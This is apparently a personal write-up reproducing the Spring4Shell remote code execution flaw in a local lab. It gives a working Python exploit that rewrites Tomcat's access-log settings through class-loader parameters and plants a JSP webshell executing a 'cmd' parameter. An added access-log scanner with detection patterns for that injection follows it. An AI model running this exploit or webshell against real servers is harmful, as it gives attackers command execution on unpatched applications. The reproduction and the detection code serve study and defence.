Spring RCE 0day vulnerability
Background
After this hole leaked on the 29th I was honestly slacking off and didn't do much with it.
I only got hold of an environment on the 31st, and then reproduced it following the author's write-up.
- Simple idea: set up a Spring project environment. The pitfalls were that a few dependency packages were missing, and that JDK 17 does not support the vulnerability.
- How it works: the Bean object creation path exposes a cached class object; using that as the pivot, a log-writing call chain is constructed, which is what gives RCE.
- exp:

```python
from time import sleep
import requests

# Step 1: bind the AccessLogValve properties through the class loader path
# so that the log file becomes a .jsp under the deployed webroot.
test = ["class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bfuck%7Di",
        "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp",
        "class.module.classLoader.resources.context.parent.pipeline.first.directory=/Users/yunoon/Downloads/spring"
        "-rce-war-fa55cb4b11516784574d06948d53ac90f8430f50/out/artifacts/stupidRumor_war_exploded",
        "class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp",
        "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="]
url = "http://localhost:8084/stupidRumor_war_exploded/index?"
url2 = "http://localhost:8084/stupidRumor_war_exploded/index?"
for i in range(5):
    url2 = url2 + "&" + test[i]
print(url2)
res = requests.get(url=url2)
print(res.status_code)

# Step 2: send a request whose "fuck" header is written into the log via the
# %{fuck}i pattern, which lands the JSP content in the log file.
header = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 "
                  "Safari/537.36",
    'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    'fuck': '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>',
    'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    'Accept-Encoding': "gzip, deflate",
    'Connection': "close",
    'Upgrade-Insecure-Requests': "1",
    'Sec-Fetch-Dest': "document",
    'Sec-Fetch-Mode': "navigate",
    'Sec-Fetch-Site': "none",
    'Sec-Fetch-User': "?1",
}
# url1 was commented out in the original and left the script with an undefined name
url1 = "http://localhost:8084/stupidRumor_war_exploded/fuckUUUU"
res = requests.get(url=url1, headers=header)
print(res.status_code)
```
- I'll analyse the underlying principle later, when I get around to it.
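As an added defender-side example (not code from the original post), the following Python scans constructed Tomcat access-log lines for the `class.module.classLoader...` parameter names that the exp above sends, and marks requests that tune the AccessLogValve fields used to turn the log into a JSP. The log lines, client IPs and paths are made-up samples; the `%{c}i` value stands in for the page's `%{fuck}i` pattern.

```python
# Added example (not the original post's code): flag Spring4Shell-style
# class-loader property injection in request parameters, the way a defender
# would scan Tomcat access logs. All log lines below are constructed samples.
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A parameter name that walks from the bound bean into the class loader:
# class.module.classLoader..., class.classLoader..., Class.module.classLoader...
CLASSLOADER_PATH = re.compile(r"^(class|Class)(\.module)?\.classLoader(\.|\[|$)")
# AccessLogValve properties the exp above sets to write a JSP into the webroot.
VALVE_FIELDS = {"pattern", "suffix", "directory", "prefix", "fileDateFormat"}
# Combined log format: ip ident user [time] "METHOD target HTTP/x"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(query):
    """Fully decoded parameter names in `query` that reach the class loader.
    parse_qsl decodes once; the extra unquote() also catches double encoding."""
    hits = []
    for name, _value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(name)
        if CLASSLOADER_PATH.search(decoded):
            hits.append(decoded)
    return hits

def scan_access_log(lines):
    """One finding per log line whose query string touches the class loader."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group(1), urlsplit(m.group(2))
        hits = suspicious_params(target.query)
        if hits:
            findings.append({
                "ip": ip,
                "path": target.path,
                "params": hits,
                # True when the request tunes the access-log valve (log-to-JSP write)
                "log_valve_write": any(h.rsplit(".", 1)[-1] in VALVE_FIELDS for h in hits),
            })
    return findings

SAMPLE_LOG = [  # constructed sample lines
    '10.0.0.5 - - [31/Mar/2022:10:01:02 +0800] "GET /app/index?name=bob&age=3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [31/Mar/2022:10:01:05 +0800] "GET /app/index?class.module.classLoader.resources'
    '.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent'
    '.pipeline.first.prefix=shell HTTP/1.1" 200 12',
    '10.0.0.9 - - [31/Mar/2022:10:01:07 +0800] "POST /app/index?class%252Emodule%252EclassLoader'
    '.resources.context.parent.pipeline.first.pattern=%25%7Bc%7Di HTTP/1.1" 200 12',
    '10.0.0.7 - - [31/Mar/2022:10:01:09 +0800] "GET /app/index?Class.module.classLoader.DefaultAssertionStatus=true HTTP/1.1" 400 0',
]
```

Run `scan_access_log(SAMPLE_LOG)` to get one finding per offending line; the double-encoded third line is caught because parameter names are decoded a second time before matching.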